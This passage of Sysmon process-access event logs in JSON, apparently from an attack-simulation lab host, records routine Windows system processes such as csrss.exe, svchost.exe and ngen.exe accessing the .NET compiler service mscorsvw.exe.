L32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7033,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.246\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010A6820E00}\r\nTargetProcessId: 2480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.246","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010A6820E00}","TargetProcessId":"2480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7034,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.246\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010A6820E00}\r\nTargetProcessId: 2480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.246","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010A6820E00}","TargetProcessId":"2480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7035,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.308\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A6FF0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.308","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A6FF0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7036,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.308\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A6FF0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.308","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A6FF0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7037,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010F3860E00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010F3860E00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7038,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.371\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010C68A0E00}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.371","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010C68A0E00}","TargetProcessId":"3824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7039,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.371\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010C68A0E00}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.371","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010C68A0E00}","TargetProcessId":"3824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7040,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.371\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010C68A0E00}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.371","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010C68A0E00}","TargetProcessId":"3824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
